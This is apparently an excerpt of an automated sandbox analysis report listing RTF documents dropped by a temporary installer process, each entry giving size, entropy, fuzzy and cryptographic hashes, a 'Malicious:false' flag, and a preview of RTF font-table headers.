                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset0\fprq2 Arial CYR;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f3150
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):41999
                                                                                                                                                                                                                                                          Entropy (8bit):5.055697465978919
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:VkmzS4JUAauTJcOerjj1oKauIKx49kWYcFBxBMdk+tkakaLMvIghQq4TP:Vku11S7u4TP
                                                                                                                                                                                                                                                          MD5:38D9C60C2583CC6714A0F317F3FD24AD
                                                                                                                                                                                                                                                          SHA1:06F40D2DD9A933E7073FD6B57475B879582B99D2
                                                                                                                                                                                                                                                          SHA-256:4825CB084B4CBE44982E0B965CCE2025C23D43CC3DDB6B4389F811C07A5EE872
                                                                                                                                                                                                                                                          SHA-512:C2397F026AF1AEFBE283F59D8188CB17C4BB43F6F228FFBF07A167DFC636D6D7504FC1BF69F53451C361FCD02646B9E96C2A6BE0FD3B12A58B9E42D8A729FB4D
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset0\fprq2 Arial CYR;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f3150
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38095
                                                                                                                                                                                                                                                          Entropy (8bit):5.023434979525739
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:qY6g3X45Y8qb7PzybdKkjYeQZBzyKIl6ZIi6rGsoUwEAG2DaGZ:qhg3feQZ5yKIl2U4Z
                                                                                                                                                                                                                                                          MD5:BF8EAEFA279A7B4973C0AEA344342EEA
                                                                                                                                                                                                                                                          SHA1:FC9B1F4747B94663D9BE6A446F8C186D981321F0
                                                                                                                                                                                                                                                          SHA-256:05D8BABE44F84B4DD6022B8D236C2BF93917E8E38C14F3B700186B8C3C1209C0
                                                                                                                                                                                                                                                          SHA-512:DDB4F723299CB3F50206830FD9809198923FAE710CE314A22558C26D235B85E1BAC6562C8A17C723857734DB0432158FC22450FE43AB3A0FFF5704D8CA885175
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff31507\deff0\stshfdbch31506\stshfloch31506\stshfhich31506\stshfbi31507\deflang3082\deflangfe3082\themelang3082\themelangfe0\themelangcs0{\fonttbl{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fh
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):55781
                                                                                                                                                                                                                                                          Entropy (8bit):4.974374262253835
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkd4JQJHT2njX8x3TLjwUtqYepAkVZEdvI9DhL02GZLu5UZcHXqjHZCNVsMQgB:wqdThL0kIIA9Y
                                                                                                                                                                                                                                                          MD5:0BF8EF2B17B829705BB1D37632503C1F
                                                                                                                                                                                                                                                          SHA1:5E969D18969120A577205E785D8641CAD1037AA5
                                                                                                                                                                                                                                                          SHA-256:665B118FF5A8EA42EC98EB73371D9F28DAA619617F014E4C6FB9F4281521D391
                                                                                                                                                                                                                                                          SHA-512:6FA8B101F982EC8CB3987057591C90300C0C158A74D4DBCEFF179E994E9A560C5EF0F130314639B751B01501465B4D55C8DA68F95FF1F9E97174B3A8CF264AB3
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 0
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):68966
                                                                                                                                                                                                                                                          Entropy (8bit):4.980232511599592
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFy4FxrUJHT2njX8x3TLjwUtqYepAkVZEdvI9vTkdr9oY7sad4m11F8yO61x3fj:wqJ7RTkdtIA9J
                                                                                                                                                                                                                                                          MD5:84C18085AA83A3983748A25518050BF5
                                                                                                                                                                                                                                                          SHA1:92861E7CC4A6C458188EE78856C6D542EC279BD8
                                                                                                                                                                                                                                                          SHA-256:BB5C8F79F380A101456F8C6157E9999F906CE697B357789DB415B5182D4BBA21
                                                                                                                                                                                                                                                          SHA-512:A8477B72B61D832DB1C72074E70E6A3752F67C21A9B6DB02261CD155AD583806DFA866A4533DB2FFDE9D2B978C4972E3B4FA0BC06AC2E91F4F207C8468653A3B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Tim
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42355
                                                                                                                                                                                                                                                          Entropy (8bit):5.0527900529716705
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmV4JAF/WMvgDNHkAwd6Lkygbq4TF:VklnIV4J34TF
                                                                                                                                                                                                                                                          MD5:6E4790A124B7FF2124F2D64A1F5935AE
                                                                                                                                                                                                                                                          SHA1:809C008765ADDE1CFF719DF84F5D1A6972C9D15A
                                                                                                                                                                                                                                                          SHA-256:7BC836689CF9FF9CF09F7E58AF04356C29C44CD67256FF828873AFAE1D9AD78A
                                                                                                                                                                                                                                                          SHA-512:9DA4AFC8A0E1A92A33ED8D33C8C3E6162DC0FCED24BF9A65A69ED92380B10E5B639E6809067E1D8A7F2BCD7300A809CFBA07693AF9A6B425CCDA76CAC53AB38C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45797
                                                                                                                                                                                                                                                          Entropy (8bit):5.048112106920449
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmms0Fzyf/8Ze52zxn1yIATqQfIUj1gCK/:VklnIsM4T4
                                                                                                                                                                                                                                                          MD5:B282950E706D40B97814A1BE2F1513FE
                                                                                                                                                                                                                                                          SHA1:82318E2310302B88264AF88800CB5A6762446C20
                                                                                                                                                                                                                                                          SHA-256:C93DEB9DF3F1878F380EC3C9348E22E07A5A38CC005D180FFAE3EF7C663BA567
                                                                                                                                                                                                                                                          SHA-512:0A5128EE9895BDB59F247B49B105E990675E27A9F93F006E88500CEBE5084722DD4D1CC74CDC31AC65AAAE0962D4FA2F1EDB96C26AA4CBE733054B35D047C49B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):54358
                                                                                                                                                                                                                                                          Entropy (8bit):5.030949914338969
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13TxjelQcX09coHJreOYSN4UIRopZMggLBbWm6CgqMPYZtYJxewPO1nS3jcL9A:VkLjoVq4TC
                                                                                                                                                                                                                                                          MD5:72F2281B43D886812D0AB9227F12438E
                                                                                                                                                                                                                                                          SHA1:9FA51047B63B8C6771351030059CA120DB60FCDA
                                                                                                                                                                                                                                                          SHA-256:A1D007010FAB6C2E57A687E45B26AC54BCCDCB91D4310C0BD7ECD0C478AFF63A
                                                                                                                                                                                                                                                          SHA-512:78FF6C728C82E2790C1D43759EDC5ECF4A883B6034246E4CC40A4526254E7CCBC766225B51A6ED22AD3B6EC96A2411F47922549146C7D621C68F9C8BCBB22226
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44680
                                                                                                                                                                                                                                                          Entropy (8bit):5.0440980385984355
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk13ixj20TaGC5X2kEDYd/awBGkRYoGPLo9C4Yhn8uw8h33SSnHDlM85baNRWmgA:VkGt4T3
                                                                                                                                                                                                                                                          MD5:8F7F1A8853F08FDC85B12A89E08CF432
                                                                                                                                                                                                                                                          SHA1:D2F7DCC9250548EA79E9AB2148E232B183527D2D
                                                                                                                                                                                                                                                          SHA-256:519A67854D21C49B501187DC6DE66AB09C403ABE68F5E3F20ECEAFD24FD92A51
                                                                                                                                                                                                                                                          SHA-512:871B3634AB86A66E58424D45984EF0EA8973220D3A17F58B4CD399807045E5A6C72505F82E40A2789BBCF62C219E1EBBFD109DB29A0ECD3433AD04A47434A48A
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43957
                                                                                                                                                                                                                                                          Entropy (8bit):5.05318714443273
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqAFbMmzigeIgpwgM/tI1m3AG8bq4Tn:VklnIqk4Tn
                                                                                                                                                                                                                                                          MD5:C802BE58C5B4EEE36B30EAE58603CBE5
                                                                                                                                                                                                                                                          SHA1:3F245C80D14B4051CDE661FE373FB7C57020019A
                                                                                                                                                                                                                                                          SHA-256:6D1E5226FE921E8E23C48A0F7C4FC06B815BB0D777C2DE20D6E4EB2A53100023
                                                                                                                                                                                                                                                          SHA-512:402EBEFF45912562F8248CA7018BEEDE532E91F54839AA5AE556590D6F9D9D786E39E9776808C30F050CDC22BEB595A715DF8A2603ED1AF675A2B07665B249FB
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43947
                                                                                                                                                                                                                                                          Entropy (8bit):5.053170962954844
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGUxQBkyKWm+m2NjrOX/zJwPzFZ6LUECxfxkSFgc/rcaVbnq4Tf:VklRPc4Tf
                                                                                                                                                                                                                                                          MD5:874129F2A6DD7287BADBF2EBD223923F
                                                                                                                                                                                                                                                          SHA1:A6D84C0AE81F13DE1C8952A8EA3602DC54B99C2E
                                                                                                                                                                                                                                                          SHA-256:C824F8E324B7B859ADCCA1F38437CEE6AA19ECF8FB5C8723C6347DCEA2206128
                                                                                                                                                                                                                                                          SHA-512:236A143EC7C0E1151CAE3B0399884E7498327B2F9E4C03FA65DCDCD9628CEE9BE6DEEC5A7B5312E8CB8B016C4B5BDAADDAEDD49E20F7D75F71AD63D49F85EDA2
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):44885
                                                                                                                                                                                                                                                          Entropy (8bit):5.051249541456295
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:Vk1q34J9zZenGLQ4oaqVYmSSlSQ4KxTmmqoFleTHHqaXD8TfLlCeTxDn4UfvUwNi:VklnIqN4Tm
                                                                                                                                                                                                                                                          MD5:26DF31606E6051A5AB82AFA526964B5B
                                                                                                                                                                                                                                                          SHA1:E567611817B3963033B65E615EE4ABB3FCE7499A
                                                                                                                                                                                                                                                          SHA-256:8B807D3D26611E1DD448B29E0626173AE0C4077974E4BC018358536D48A6F510
                                                                                                                                                                                                                                                          SHA-512:49BF5203F94FDB4136E58F17CFF137DD5685372A135701E22649E1B2661A3F48AD09B2FE6EDBA57AF4DD80C0766934AE2A281F845D32C9D529A3C20A3E9315F6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc1\adeff0\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang3082\deflangfe3082\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset0\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42973
                                                                                                                                                                                                                                                          Entropy (8bit):5.043020142659255
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:wqFkwxjeVGh+DoLLXI1nhDGi3w2EHlT2njX8x3DkF8zHtrWM+cimZ/6A9r:wqR3tIA9r
                                                                                                                                                                                                                                                          MD5:286021A4AA9BD225FA7A87089380213E
                                                                                                                                                                                                                                                          SHA1:DA805EA3171A5FFF8357CD89F798D576D0B27E70
                                                                                                                                                                                                                                                          SHA-256:C447B4CA501DAB11FCDFF381BABF34C63BE48B0DADBC538D2C5F1CD07F4D7BCF
                                                                                                                                                                                                                                                          SHA-512:F4A21476EE1870D47162C29625D966D37C16B3F40EE30F54E68A8F81BAC74DEE3FD5C7489DC5F883745DB98E7BCB69B80DB00A664A3330FB0AB1DEF3AA9F7F56
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
